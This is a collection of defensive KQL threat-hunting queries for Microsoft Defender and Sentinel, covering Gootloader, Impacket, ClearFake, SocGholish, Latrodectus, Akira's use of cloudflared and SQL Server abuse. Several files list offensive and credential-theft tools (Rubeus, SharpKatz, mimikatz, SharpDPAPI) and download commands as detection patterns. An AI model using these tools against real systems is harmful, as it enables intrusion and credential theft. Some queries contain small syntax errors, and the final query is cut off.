/external_data_lookup_bazaar_abuse_ch.kusto: -------------------------------------------------------------------------------- 1 | ## https://bazaar.abuse.ch/ 2 | let abuse_ch_malware = externaldata(data:dynamic) 3 | [ 4 | h@"https://bazaar.abuse.ch/export/csv/recent/" 5 | ] 6 | with(format="txt",ignoreFirstRecord=true); 7 | abuse_ch_malware 8 | | extend firstSeen = todatetime(data[0]) 9 | | extend reporter = tostring(data[5]) 10 | | extend fileName = tostring(data[6]) 11 | | extend fileTypeGuess = tostring(data[7]) 12 | | extend mimeType = tostring(data[8]) 13 | | extend signature = tostring(data[9]) 14 | | extend clamAv = tostring(data[10]) 15 | | extend vtPercent = tostring(data[11]) 16 | | extend imphash = tostring(data[12]) 17 | | extend sha256 = tostring(data[2]) 18 | | extend sha1 = tostring(data[4]) 19 | | extend md5 = tostring(data[3]) 20 | | extend ssdeep = tostring(data[13]) 21 | | extend tlsh = tostring(data[14]) 22 | | where isnotempty(firstSeen) 23 | | project-away data 24 | -------------------------------------------------------------------------------- /gootloader.md: -------------------------------------------------------------------------------- 1 | # Gootloader Hunt Queries 2 | 3 | ## Source: The Goot cause: Detecting Gootloader and its follow-on activity ([redcanary.com](https://redcanary.com/blog/gootloader/)) 4 | 5 | **New detection opportunity: wscript.exe spawning cscript.exe and PowerShell** 6 | This detection opportunity identifies the chain of process executions—whereby wscript.exe spawns cscript.exe and cscript.exe spawns powershell.exe—described in the Execution section that we updated on November 18, 2022. 7 | 8 | `// looking for gootloader process execution pattern 9 | DeviceProcessEvents 10 | | where InitiatingProcessFileName in~ ("wscript.exe","cscript.exe") and FileName in~ ("cscript.exe","powershell.exe","cmd.exe")` 11 | 12 | `//looking for the typical gootloader process execution pattern 13 | DeviceProcessEvents 14 | | where InitiatingProcessParentFileName =~ "wscript.exe" and InitiatingProcessFileName =~ "cscript.exe" and FileName in~ ("powershell.exe")` 15 | 16 | `//can be used to look at process ancestry in defender 17 | DeviceProcessEvents 18 | | project InitiatingProcessParentFileName, InitiatingProcessFileName, FileName 19 | | summarize count() by InitiatingProcessParentFileName, InitiatingProcessFileName, FileName``` 20 | 21 | **Detection opportunity: Windows Script Host (wscript.exe) executing content from a user’s AppData folder** 22 | This detection opportunity identifies the Windows Script Host, wscript.exe, executing a JScript file from the user’s AppData folder. This works well to detect instances where a user has double-clicked into a Gootloader ZIP file and then double-clicked on the JScript script to execute it. 23 | 24 | `DeviceProcessEvents 25 | | where FileName =~ "wscript.exe" and ProcessCommandLine has_all ("appdata\\",".js")` 26 | 27 | **Detection opportunity: PowerShell (powershell.exe) performing a reflective load of a .NET assembly** 28 | This detection opportunity identifies PowerShell loading a .NET assembly into memory for execution using the System.Reflection capabilities of the .NET Framework. This detects PowerShell loading the .NET component of Gootloader and multiple additional threats in the wild. 29 | 30 | `DeviceProcessEvents 31 | | where FileName =~ "powershell.exe" and ProcessCommandLine has_all ("Reflection.Assembly","Load","byte[]")` 32 | 33 | **Detection opportunity: Rundll32 (rundll32.exe) with no command-line arguments** 34 | This detection opportunity identifies rundll32.exe executing with no command-line arguments as an injection target like we usually see for Cobalt Strike beacon injection. The beacon distributed by Gootloader in this instance used rundll32.exe, as do many other beacons found in the wild.``` 35 | 36 | `DeviceProcessEvents 37 | | where InitiatingProcessFileName =~ "rundll32.exe" and isempty(InitiatingProcessCommandLine) 38 | | join DeviceNetworkEvents on InitiatingProcessFileName 39 | | where isnotempty(RemoteUrl)` 40 | -------------------------------------------------------------------------------- /impacket_kusto_queries.md: -------------------------------------------------------------------------------- 1 | # Impacket 2 | 3 | # Source: https://redcanary.com/threat-detection-report/threats/impacket/ 4 | 5 | ## Impacket SMBexec execution 6 | 7 | `//SMBexec execution 8 | //This detection analytic uses a regular expression to identify commands from the Impacket smbexec script, which allows a semi-interactive shell used through SMB. The regular expression identifies the name of a file share used to store output from the commands for interaction. 9 | // Regex needs testing with current impacket logs 10 | //Source: https://redcanary.com/threat-detection-report/threats/impacket/ 11 | DeviceProcessEvents 12 | | where InitiatingProcessFileName =~ "services.exe" and FileName =~ "cmd.exe" and ProcessCommandLine matches regex @"(?i)cmd.exe\s+\/Q\s+\/c\s+echo\s+cd\s+>\s+\\\\127.0.0.1\\[a-zA-Z]{1,}\$\\__output\s*2\s*>\s*&\s*1\s*>\s+.*\s+&"` 13 | 14 | ## Impacket WMIexec execution 15 | 16 | `//WMIexec execution 17 | //This detection analytic uses a regular expression to identify commands from the Impacket wmiexec script, which allows a semi-interactive shell used via WMI. This analytic shows output being redirected to the localhost ADMIN$ share. The regular expression identifies an output file named as a Unix timestamp (similar to 1642629756.323274) generated through the script. 18 | // Regex needs testing with current impacket logs 19 | //Source: https://redcanary.com/threat-detection-report/threats/impacket/ 20 | DeviceProcessEvents 21 | | where InitiatingProcessParentFileName =~ "wmiprvse" and InitiatingProcessFileName =~ "cmd.exe" and InitiatingProcessCommandLine has_all ("cmd.exe","/Q","/c",@"\\127.0.0.1\ADMIN\$\__","2>&1") and ProcessCommandLine matches regex @"[0-9]{1,10}\.[0-9]{1,10}"` 22 | -------------------------------------------------------------------------------- /inmemory_load_of_hacktool-powersploit.md: -------------------------------------------------------------------------------- 1 | ## MDE and Sentinel 2 | 3 | ``` 4 | //PowerSploit in memory module loads 5 | let iocList = dynamic ([ 6 | "powersploit", 7 | "Win32", 8 | "DynamicAssembly", //can cause FPs 9 | "ReflectedDelegate", 10 | "SSPI", 11 | "SSPI2", 12 | "VaultUtil", 13 | "VSSUtil", 14 | "BlueScreen", 15 | "Win32" 16 | ]); 17 | DeviceEvents 18 | | extend module = parse_json(AdditionalFields).ModuleILPathOrName 19 | | where ActionType =~ "ClrUnbackedModuleLoaded" and module in~ (iocList) and InitiatingProcessFileName =~ "powershell.exe" 20 | ``` 21 | -------------------------------------------------------------------------------- /inmemory_load_of_hacktool.md: -------------------------------------------------------------------------------- 1 | # Catch in memory loading of hack tools for example loading via a c2 framework such as CobaltStrike 2 | 3 | ## Source: Recent Purple Team 4 | 5 | ## MDE 6 | 7 | ``` 8 | let iocList = dynamic ([ 9 | "BOFNET", 10 | "SharpUp", 11 | "ReflectedDelegate", 12 | 'ADCollector', 13 | 'ADCSPwn', 14 | 'ADSearch', 15 | 'ADFSDump', 16 | 'AtYourService', 17 | 'BetterSafetyKatz', 18 | 'Certify', 19 | 'EDD', 20 | 'ForgeCert', 21 | 'DeployPrinterNightmare', 22 | 'Grouper2', 23 | 'Group3r', 24 | 'KrbRelay', 25 | 'KrbRelayUp', 26 | 'InveighZero', 27 | 'LockLess', 28 | 'PassTheCert', 29 | 'PurpleSharp', 30 | 'Rubeus', 31 | 'SafetyKatz', 32 | 'SauronEye', 33 | 'scout', 34 | 'SearchOutlook', 35 | 'Seatbelt', 36 | 'Sharp-SMBExec', 37 | 'SharpAllowedToAct', 38 | 'SharpAppLocker', 39 | 'SharpBlock', 40 | 'SharpBypassUAC', 41 | 'SharpChisel', 42 | 'SharpChrome', 43 | 'SharpChromium', 44 | 'SharpCloud', 45 | 'SharpCOM', 46 | 'SharpCrashEventLog', 47 | 'SharpDir', 48 | 'SharpDoor', 49 | 'SharpDPAPI', 50 | 'SharpDump', 51 | 'SharpEDRChecker', 52 | 'SharpExec', 53 | 'SharPersist', 54 | 'SharpFiles', 55 | 'SharpGPOAbuse', 56 | 'SharpHandler', 57 | 'SharpHose', 58 | 'SharpHound', 59 | 'SharpKatz', 60 | 'SharpLaps', 61 | 'SharpMapExec', 62 | 'SharpMiniDump', 63 | 'SharpMove', 64 | 'SharpPrinter', 65 | 'SharpNoPSExec', 66 | 'SharpRDP', 67 | 'SharpReg', 68 | 'SharpSCCM', 69 | 'SharpSecDump', 70 | 'SharpShares', 71 | 'SharpSphere', 72 | 'SharpSpray', 73 | 'SharpStay', 74 | 'SharpSvc', 75 | 'SharpSniper', 76 | 'SharpSQLPwn', 77 | 'SharpTask', 78 | 'SharpUp', 79 | 'SharpView', 80 | 'SharpWMI', 81 | 'SharpWebServer', 82 | 'SharpWifiGrabber', 83 | 'SharpZeroLogon', 84 | 'Shhmon', 85 | 'Snaffler', 86 | 'SqlClient', 87 | 'StandIn', 88 | 'StickyNotesExtract', 89 | 'SweetPotato', 90 | 'ThunderFox', 91 | 'TruffleSnout', 92 | 'TokenStomp', 93 | 'Watson', 94 | 'winPEAS', 95 | 'WMIReg', 96 | 'Whisker' 97 | ]); 98 | DeviceEvents 99 | | extend module = parse_json(AdditionalFields).ModuleILPathOrName 100 | | where ActionType =~ "ClrUnbackedModuleLoaded" and module in~ (iocList) and InitiatingProcessFileName =~ "powershell.exe" 101 | ``` 102 | 103 | ## Sentinel 104 | 105 | ``` 106 | let iocList = dynamic ([ 107 | "BOFNET", 108 | "SharpUp", 109 | "ReflectedDelegate", 110 | 'ADCollector', 111 | 'ADCSPwn', 112 | 'ADSearch', 113 | 'ADFSDump', 114 | 'AtYourService', 115 | 'BetterSafetyKatz', 116 | 'Certify', 117 | 'EDD', 118 | 'ForgeCert', 119 | 'DeployPrinterNightmare', 120 | 'Grouper2', 121 | 'Group3r', 122 | 'KrbRelay', 123 | 'KrbRelayUp', 124 | 'InveighZero', 125 | 'LockLess', 126 | 'PassTheCert', 127 | 'PurpleSharp', 128 | 'Rubeus', 129 | 'SafetyKatz', 130 | 'SauronEye', 131 | 'scout', 132 | 'SearchOutlook', 133 | 'Seatbelt', 134 | 'Sharp-SMBExec', 135 | 'SharpAllowedToAct', 136 | 'SharpAppLocker', 137 | 'SharpBlock', 138 | 'SharpBypassUAC', 139 | 'SharpChisel', 140 | 'SharpChrome', 141 | 'SharpChromium', 142 | 'SharpCloud', 143 | 'SharpCOM', 144 | 'SharpCrashEventLog', 145 | 'SharpDir', 146 | 'SharpDoor', 147 | 'SharpDPAPI', 148 | 'SharpDump', 149 | 'SharpEDRChecker', 150 | 'SharpExec', 151 | 'SharPersist', 152 | 'SharpFiles', 153 | 'SharpGPOAbuse', 154 | 'SharpHandler', 155 | 'SharpHose', 156 | 'SharpHound', 157 | 'SharpKatz', 158 | 'SharpLaps', 159 | 'SharpMapExec', 160 | 'SharpMiniDump', 161 | 'SharpMove', 162 | 'SharpPrinter', 163 | 'SharpNoPSExec', 164 | 'SharpRDP', 165 | 'SharpReg', 166 | 'SharpSCCM', 167 | 'SharpSecDump', 168 | 'SharpShares', 169 | 'SharpSphere', 170 | 'SharpSpray', 171 | 'SharpStay', 172 | 'SharpSvc', 173 | 'SharpSniper', 174 | 'SharpSQLPwn', 175 | 'SharpTask', 176 | 'SharpUp', 177 | 'SharpView', 178 | 'SharpWMI', 179 | 'SharpWebServer', 180 | 'SharpWifiGrabber', 181 | 'SharpZeroLogon', 182 | 'Shhmon', 183 | 'Snaffler', 184 | 'SqlClient', 185 | 'StandIn', 186 | 'StickyNotesExtract', 187 | 'SweetPotato', 188 | 'ThunderFox', 189 | 'TruffleSnout', 190 | 'TokenStomp', 191 | 'Watson', 192 | 'winPEAS', 193 | 'WMIReg', 194 | 'Whisker' 195 | ]); 196 | DeviceEvents 197 | | extend module = parse_json(AdditionalFields).ModuleILPathOrName 198 | | where ActionType =~ "ClrUnbackedModuleLoaded" and module in~ (iocList) and InitiatingProcessFileName =~ "powershell.exe" 199 | ``` 200 | -------------------------------------------------------------------------------- /internal_phishing.md: -------------------------------------------------------------------------------- 1 | # Internal Phishing Kusto Queries 2 | 3 | `EmailEvents 4 | | where EmailDirection =~ "Intra-org" and isnotempty(ThreatTypes) 5 | | summarize count() by ThreatTypes` 6 | 7 | `EmailEvents 8 | | where EmailDirection =~ "Intra-org" and ThreatTypes =~ "malware"` 9 | 10 | `EmailEvents 11 | | where EmailDirection =~ "Intra-org" and ThreatTypes =~ "phish"` 12 | 13 | `EmailEvents 14 | | where EmailDirection =~ "Intra-org" and isnotempty(ThreatTypes) 15 | | summarize count() by ThreatTypes` 16 | -------------------------------------------------------------------------------- /ipfs_phishing_kusto_query.md: -------------------------------------------------------------------------------- 1 | # IPFS Web3 Phish 2 | 3 | # All emails 4 | 5 | `//check for phishing emails being delivered that potentially use interplanetary file system (ipfs) to host malicious content used in phishing campaigns. 6 | //check for subsequent connections to the site: DeviceNetworkEvents | where RemoteUrl contains "ipfs.io" 7 | //https://blog.talosintelligence.com/ipfs-abuse/ 8 | //https://github.com/Cisco-Talos/IOCs/tree/main/2022/11 9 | EmailEvents 10 | | where TimeGenerated > ago(14d) 11 | | join EmailUrlInfo on NetworkMessageId 12 | | where EmailDirection =~ "Inbound" and Url contains "ipfs.io"` 13 | 14 | # Delivered emails 15 | 16 | `//check for phishing emails being delivered that potentially use interplanetary file system (ipfs) to host malicious content used in phishing campaigns. 17 | //check for subsequent connections to the site: DeviceNetworkEvents | where RemoteUrl contains "ipfs.io" 18 | //https://blog.talosintelligence.com/ipfs-abuse/ 19 | //https://github.com/Cisco-Talos/IOCs/tree/main/2022/11 20 | EmailEvents 21 | | where TimeGenerated > ago(14d) 22 | | join EmailUrlInfo on NetworkMessageId 23 | | where EmailDirection =~ "Inbound" and Url contains "ipfs.io" and DeliveryAction != 'Blocked'` 24 | 25 | # Looking for post phish clickers 26 | `// you may need to adjust your tables and fields accordingly but the intent is to check your URI or request fields using the regex below 27 | CommonSecurityLog | where (cs_uri matches regex @'(?i)ipfs.io/ipfs.+\..+@.+\..+')` 28 | -------------------------------------------------------------------------------- /lactrodectus.md: -------------------------------------------------------------------------------- 1 | //Loading Latrodectus DLLs 2 | The following query looks for evidence of rundll32 loading the Latrodectus DLL. Run query 3 | 4 | //DeviceProcessEvents 5 | | where InitiatingProcessCommandLine has_any("capisp.dll", "aclui.dll") and InitiatingProcessFileName in ("rundll32.exe", "msiexec.exe") 6 | Latrodectus MSI and DLL files 7 | 8 | //This query identifies newly created (dropped) Latrodectus MSI and DLL files. Run query 9 | DeviceFileEvents 10 | | where FolderPath has_any ("Roaming\\aclui", "Roaming\\capisp", "temp\vpn.msi", "neuro.msi", "bst.msi") and InitiatingProcessCommandLine has_any("msiexec", "rundll32") 11 | Latrodectus DLL persistence 12 | 13 | //The following query looks for evidence of Latrodectus DLL persistence using the startup registry key. Run query 14 | DeviceRegistryEvents 15 | | where ActionType == "RegistryValueSet" 16 | | where RegistryKey has @"CurrentVersion\Run" 17 | | where RegistryValueData has_any(@"AppData\Roaming\capisp.dll", @"AppData\Roaming\aclui.dll") 18 | | where InitiatingProcessFileName == "rundll32.exe" 19 | -------------------------------------------------------------------------------- /lolbin_certutil_download_direct_ip.md: -------------------------------------------------------------------------------- 1 | # Title 2 | Certutil downloading a file with suspicious command line arguments 3 | 4 | # Description 5 | Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs. 6 | 7 | # Source 8 | Nasreddine Bencherchali (Nextron Systems) 9 | - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil 10 | - https://forensicitguy.github.io/agenttesla-vba-certutil-download/ 11 | - https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/ 12 | - https://twitter.com/egre55/status/1087685529016193025 13 | - https://lolbas-project.github.io/lolbas/Binaries/Certutil/ 14 | - https://twitter.com/_JohnHammond/status/1708910264261980634 15 | 16 | # MITRE ATT&CK Techniques 17 | - T1027 18 | 19 | # Query 20 | 21 | ``` 22 | //proc_creation_win_certutil_download_direct_ip 23 | DeviceProcessEvents 24 | | where (FolderPath endswith @'\certutil.exe' or ProcessVersionInfoOriginalFileName =~ @'CertUtil.exe' or InitiatingProcessVersionInfoOriginalFileName =~ @'CertUtil.exe') and ProcessCommandLine has_any (@'urlcache ',@'verifyctl ') and ProcessCommandLine has_any (@'://1',@'://2',@'://3',@'://4',@'://5',@'://6',@'://7',@'://8',@'://9') and not ( ProcessCommandLine contains @'://7-') 25 | 26 | //proc_creation_win_certutil_download_direct_ip 27 | DeviceNetworkEvents 28 | | where ( InitiatingProcessFileName =~ "certutil.exe" or InitiatingProcessVersionInfoOriginalFileName 29 | =~ "certutil.exe") and RemoteIPType =~ "Public" and InitiatingProcessCommandLine has_any (@'urlcache ',@'verifyctl ') 30 | ``` 31 | -------------------------------------------------------------------------------- /lolbins_kusto_query.md: -------------------------------------------------------------------------------- 1 | # Hunt for possible LOLBINS activity 2 | 3 | `//let excludedProcesses = datatable (name:string)["mssense.exe","senseir.exe"]; //add exclusions 4 | DeviceProcessEvents 5 | | where FileName has_any ( "arp.exe", "at.exe", "attrib.exe", "cscript.exe", "dsquery.exe", "hostname.exe", "ipconfig.exe", "mimikatz.exe", "nbtstat.exe", "net.exe", "netsh.exe", "nslookup.exe", "ping.exe", "quser.exe", "qwinsta.exe", "reg.exe", "runas.exe", "sc.exe", "schtasks.exe", "ssh.exe", "systeminfo.exe", "taskkill.exe", "telnet.exe", "tracert.exe", "wscript.exe", "xcopy.exe", "pscp.exe", "copy.exe", "robocopy.exe", "certutil.exe", "vssadmin.exe", "powershell.exe", "wevtutil.exe", "psexec.exe", "bcedit.exe", "wbadmin.exe", "icacls.exe", "diskpart.exe", "ver.exe", "netstat.exe", "tasklist.exe", "route.exe", "driverquery.exe" ) 6 | //| where InitiatingProcessParentFileName !in~ (excludedProcesses) and InitiatingProcessParentFileName !in~ (excludedProcesses) and FileName !in~ (excludedProcesses) // exclude processes that produce false positives 7 | | summarize firstEvent=min(Timestamp), lastEvent=max(Timestamp), uniqueProcessNames=dcount(FileName), eventTypes=make_set(ActionType), userNames=make_set(AccountName), userDomains=make_set(AccountDomain), processIds=make_set(ProcessId), processCommandLines=make_set(ProcessCommandLine), parentProcessNames=make_set(InitiatingProcessFileName), parentProcessCommandLines=make_set(InitiatingProcessCommandLine), parentProcessPaths=make_set(InitiatingProcessFolderPath), parentProcessIds=make_set(InitiatingProcessId), grandParentProcessNames=make_set(InitiatingProcessParentFileName), grandParentProcessIds=make_set(InitiatingProcessParentId), parentUserDomain=make_set(InitiatingProcessAccountDomain), parentUserName=make_set(InitiatingProcessAccountName), processCompanyName=make_set(ProcessVersionInfoCompanyName), processProductName=make_set(ProcessVersionInfoProductName), processVersion=make_set(ProcessVersionInfoProductVersion), processInternalFileName=make_set(ProcessVersionInfoInternalFileName), processOriginalFileName=make_set(ProcessVersionInfoOriginalFileName), processFileDescription=make_set(ProcessVersionInfoFileDescription), processSize=make_set(FileSize), processSHA256=make_set(SHA256), reportIds=make_set(ReportId), Timestamp=make_list(Timestamp), count() by DeviceName, DeviceId 8 | | where uniqueProcessNames > 4 9 | | order by firstEvent` 10 | -------------------------------------------------------------------------------- /m365_email_hunt_rules.md: -------------------------------------------------------------------------------- 1 | 2 | ``` 3 | //visualise emails tagged as malware inbound 4 | EmailEvents 5 | | where TimeGenerated > ago(30d) and ThreatTypes has_any ("Malware") and EmailDirection =~ "Inbound" 6 | | summarize emails=count() by bin(TimeGenerated, 1d), SenderFromAddress 7 | | render columnchart kind=stacked 8 | ``` 9 | 10 | 11 | ``` 12 | //internal to internal, or outbound email with a malware detection 13 | EmailEvents 14 | | where TimeGenerated > ago(30d) and ThreatTypes has_any ("Malware") and EmailDirection !~ "Inbound" and SenderFromAddress !~ "postmaster@heathrow.com" and AttachmentCount > 0 15 | | summarize emails=count() by bin(TimeGenerated, 1d), SenderFromAddress 16 | | render columnchart kind=stacked 17 | ``` 18 | -------------------------------------------------------------------------------- /m365_phishing_coronation_lures.md: -------------------------------------------------------------------------------- 1 | # Tactic: Initial Access 2 | 3 | # Techniques 4 | 5 | |ID|Technique|Detail| 6 | |--|--|--| 7 | | T1566 | Phishing | https://attack.mitre.org/techniques/T1566/ | 8 | | T1566.001 | Spearphishing Attachment | https://attack.mitre.org/techniques/T1566/001/ | 9 | | T1566.002 | Spearphishing Link | https://attack.mitre.org/techniques/T1566/002/ | 10 | | T1566.003 | Spearphishing via Service | https://attack.mitre.org/techniques/T1566/003/ | 11 | 12 | # KQL hunt queries: 13 | Find all intrusion attempts for analysis: 14 | 15 | ``` 16 | EmailEvents 17 | | where EmailDirection =~ "Inbound" and ThreatTypes has_any ("Phish","Malware") and Subject contains "coronation" 18 | ``` 19 | 20 | Find successful attempts: 21 | 22 | ``` 23 | EmailEvents 24 | | where EmailDirection =~ "Inbound" and ThreatTypes has_any ("Phish","Malware") and Subject contains "coronation" and DeliveryAction !~ "Blocked" 25 | ``` 26 | 27 | There is actually a bit more nuance to the EmailEvents table when post delivery actions may have been taken to quarrantine or block eg ZAP: 28 | 29 | ``` 30 | EmailEvents 31 | | where EmailDirection =~ "Inbound" and ThreatTypes has_any ("Phish","Malware") and Subject contains "coronation" and ((DeliveryAction !~ "Blocked" or LatestDeliveryAction !~ "Blocked") or ( DeliveryLocation !~ "Quarantine" or LatestDeliveryLocation !~ "Quarantine" )) 32 | ``` 33 | 34 | Viualising the data for the above: 35 | 36 | ``` 37 | //visualise emails tagged as malware inbound 38 | EmailEvents 39 | | where TimeGenerated > ago7d) 40 | | where EmailDirection =~ "Inbound" and ThreatTypes has_any ("Phish","Malware") and Subject contains "coronation" 41 | | summarize emails=count() by bin(TimeGenerated, 1d), SenderFromAddress 42 | | render columnchart kind=stacked 43 | ``` 44 | 45 | ``` 46 | EmailEvents 47 | | where EmailDirection =~ "Inbound" and ThreatTypes has_any ("Phish","Malware") and Subject contains "coronation" and ((DeliveryAction !~ "Blocked" or LatestDeliveryAction !~ "Blocked") or ( DeliveryLocation !~ "Quarantine" or LatestDeliveryLocation !~ "Quarantine" )) 48 | | summarize emails=count() by bin(TimeGenerated, 1d), SenderFromAddress 49 | | render columnchart kind=stacked 50 | ``` 51 | -------------------------------------------------------------------------------- /mal_clearfake_appx_download.md: -------------------------------------------------------------------------------- 1 | # Title 2 | ClearFake Detection Analytics 3 | 4 | # Description 5 | Queries to detect initial creation of .appx file 6 | 7 | # Source 8 | - https://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/ 9 | 10 | # MITRE ATT&CK 11 | - 12 | 13 | # Queries for sentinel and MDE 14 | 15 | ``` 16 | //TTP: ClearFake - Possible creation of malicious .appx file 17 | DeviceFileEvents 18 | | where InitiatingProcessFileName =~ "Explorer.exe" and FileName in~ ("AppxProvider.dll","AppxManifest.xml") 19 | ``` 20 | -------------------------------------------------------------------------------- /mal_clearfake_c2.md: -------------------------------------------------------------------------------- 1 | # Title 2 | ClearFake Detection Analytics 3 | 4 | # Description 5 | Queries to detect C2 communications. 6 | 7 | # Source 8 | - https://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/ 9 | 10 | # MITRE ATT&CK 11 | - 12 | 13 | # Queries for sentinel and MDE 14 | 15 | ``` 16 | //IOC: ClearFake - Possible connection to ClearFake C2 infrastructure certificate subject CN 17 | let clearFakeDomains = externaldata(domain:string)[h@"https://raw.githubusercontent.com/m4nbat/ioc_lists/main/clearFakeIocs.txt"] 18 | with(format="txt") | distinct domain; 19 | DeviceNetworkEvents 20 | | where ActionType =~ "SslConnectionInspected" 21 | | extend issuer = tostring(parse_json(AdditionalFields.issuer)) 22 | | extend server_name = tostring(parse_json(AdditionalFields.server_name)) 23 | | extend subject = tostring(parse_json(AdditionalFields.subject)) 24 | | extend established = tostring(parse_json(AdditionalFields.established)) 25 | | extend direction = tostring(parse_json(AdditionalFields.direction)) 26 | | where server_name has_any (clearFakeDomains) 27 | ``` 28 | 29 | ``` 30 | //IOC: ClearFake - Possible connection to ClearFake C2 Infrastructure network connection to domain 31 | let clearFakeDomains = externaldata(domain:string)[h@"https://raw.githubusercontent.com/m4nbat/ioc_lists/main/clearFakeIocs.txt"] 32 | with(format="txt"); 33 | DeviceNetworkEvents 34 | | where RemoteUrl has_any (clearFakeDomains) 35 | ``` 36 | 37 | ``` 38 | //IOC: ClearFake - Possible connection to ClearFake C2 Infrastructure network connetcion to IPs 39 | let clearFakeIps = externaldata(domain:string)[h@"https://raw.githubusercontent.com/m4nbat/ioc_lists/main/clearFakeIocs.txt"] 40 | with(format="txt"); 41 | DeviceNetworkEvents 42 | | where RemoteIP has_any (clearFakeIps) 43 | ``` 44 | -------------------------------------------------------------------------------- /mal_clearfake_test.md: -------------------------------------------------------------------------------- 1 | 2 | DeviceEvents 3 | | where ActionType =~ "OtherAlertRelatedActivity" 4 | | sort by TimeGenerated desc 5 | 6 | DeviceEvents 7 | | where ActionType =~ "ExploitGuardAcgEnforced" 8 | | sort by TimeGenerated desc 9 | 10 | DeviceFileEvents 11 | | where FolderPath endswith @"\VFS\AppData\KSPSService.exe" and FileName =~ "KSPSService.exe" 12 | 13 | DeviceFileEvents 14 | | where FolderPath matches regex @"\\VFS\\AppData\\[a-zA-Z0-9]+.exe" and FileName endswith "exe" 15 | 16 | DeviceEvents 17 | | where ActionType contains "ServiceInstalled" 18 | | extend ServiceAccount_ = tostring(AdditionalFields.ServiceAccount) 19 | | extend ServiceName_ = tostring(AdditionalFields.ServiceName) 20 | | extend ServiceStartType_ = tostring(AdditionalFields.ServiceStartType) 21 | | extend ServiceType_ = tostring(AdditionalFields.ServiceType) 22 | | where FolderPath matches regex @"\\VFS\\AppData\\[a-zA-Z0-9]+.exe" //and ServiceName_ =~ "KSPSService.exe" 23 | -------------------------------------------------------------------------------- /mal_ttp_socgholish_suspicious_wscript_network_connetion.md: -------------------------------------------------------------------------------- 1 | # Title 2 | SOCGholish Detection Analytics 3 | 4 | # Description 5 | While JavaScript is everywhere on the web, it is rather unusual for the browser to download a JavaScript file and execute it via the Windows Script Host (wscript.exe). When this downloaded script starts communicating with devices outside of your network, things get even more suspicious. That said, this detection analytic may be noisy in some environments, so be prepared to identify what scripts are normally run in this way to tune out the noise. 6 | 7 | # Source 8 | - https://redcanary.com/threat-detection-report/threats/socgholish/ 9 | 10 | # MITRE ATT&CK 11 | - 12 | 13 | # Queries for sentinel and MDE 14 | 15 | ``` 16 | //TTP: SOCGhoulish variants network connection from wscript.exe with a parent process that is a browser. 17 | let browsers = datatable(name:string)["chrome","edge","firefox"]; //add more 18 | DeviceNetworkEvents 19 | | where InitiatingProcessParentFileName has_any (browsers) and InitiatingProcessFileName in~ ("wscript.exe","cscript.exe") and RemoteIPType =~ "Public" 20 | ``` 21 | -------------------------------------------------------------------------------- /md_cloudflared_akira.md: -------------------------------------------------------------------------------- 1 | # Description 2 | 3 | Interesting use of the cloudflared agent by the AKIRA ransomware Group and a quality writeup by Recon InfoSec team. A treasure trove of threat intelligence that can be used for informing defence. 4 | 5 | # Source: https://blog.reconinfosec.com/emergence-of-akira-ransomware-group 6 | 7 | A few analytics that can be tested for hunting cloudflared usage based on the report. 8 | 9 | ``` 10 | //use of cloudflared in intrusions by ransomware actor AKIRA 11 | // https://blog.reconinfosec.com/emergence-of-akira-ransomware-group 12 | let possibleVictims = 13 | DeviceFileEvents 14 | | where PreviousFileName contains "cloudflared" and PreviousFileName endswith ".exe" 15 | | distinct DeviceId; 16 | let args = datatable(arg:string)[".exe","tunnel","run","--token"]; 17 | DeviceProcessEvents 18 | | where DeviceId in (possibleVictims) and InitiatingProcessCommandLine has_all (args) or ProcessCommandLine has_all (args) 19 | ``` 20 | 21 | ``` 22 | //use of cloudflared in intrusions by ransomware actor AKIRA 23 | // https://blog.reconinfosec.com/emergence-of-akira-ransomware-group 24 | let args = datatable(arg:string)[".exe","tunnel","run","--token"]; 25 | DeviceProcessEvents 26 | | where InitiatingProcessCommandLine has_all (args) or ProcessCommandLine has_all (args) 27 | ``` 28 | 29 | ``` 30 | //use of cloudflared in intrusions by ransomware actor AKIRA 31 | // https://blog.reconinfosec.com/emergence-of-akira-ransomware-group 32 | DeviceFileEvents 33 | | where PreviousFileName contains "cloudflared" and PreviousFileName endswith ".exe" 34 | ``` 35 | -------------------------------------------------------------------------------- /mde_SQLServerAbuse_CMD.md: -------------------------------------------------------------------------------- 1 | # SQL Server Abuse 2 | 3 | # Source 4 | https://www.microsoft.com/en-us/security/blog/2023/10/03/defending-new-vectors-threat-actors-attempt-sql-server-to-cloud-lateral-movement/ 5 | 6 | ``` 7 | // This query detects instances of a SQL Server process launching a shell to run one or more suspicious commands. 8 | let relevantCmdlineTokens = pack_array 9 | ("advpack.dll","appvlp.exe","atbroker.exe","bash.exe","bginfo.exe","bitsadmin.exe","cdb.exe","certutil.exe","cl_invocation.ps1","cl_mutexverifiers.ps1","cmstp.exe","Copy-Item","csi.exe","diskshadow.exe","dnscmd.exe","dnx.exe","dxcap.exe","esentutl.exe","expand.exe","extexport.exe","extrac32.exe","findstr.exe","forfiles.exe","ftp.exe","gpscript.exe","hh.exe","ie4uinit.exe","ieadvpack.dll","ieaframe.dll","ieexec.exe","infdefaultinstall.exe", "installutil.exe","Invoke-WebRequest","makecab.exe","manage-bde.wsf","mavinject.exe","mftrace.exe","microsoft.workflow.compiler.exe","mmc.exe","msbuild.exe","msconfig.exe","msdeploy.exe","msdt.exe","mshta.exe","mshtml.dll","msiexec.exe","msxsl.exe","netstat","odbcconf.exe","pcalua.exe","pcwrun.exe","pcwutl.dll","pester.bat","ping","presentationhost.exe","pubprn.vbs","rcsi.exe","regasm.exe","register-cimprovider.exe","regsvcs.exe","regsvr32.exe","replace.exe","rundll32.exe","runonce.exe","runscripthelper.exe","schtasks.exe","scriptrunner.exe","setupapi.dll","shdocvw.dll","shell32.dll","slmgr.vbs","sqltoolsps.exe","syncappvpublishingserver.exe","syncappvpublishingserver.vbs","sysinfo","syssetup.dll","systeminfo","taskkill","te.exe","tracker.exe","url.dll","verclsid.exe","vsjitdebugger.exe","wab.exe","WebClient","wget","whoami","winrm.vbs","wmic.exe","xwizard.exe","zipfldr.dll","certutil"); 10 | DeviceProcessEvents 11 | | where Timestamp >= ago(10d) 12 | | where InitiatingProcessFileName in~ ("sqlservr.exe", "sqlagent.exe", "sqlps.exe", "launchpad.exe") 13 | | summarize DistinctProcessCommandLines = 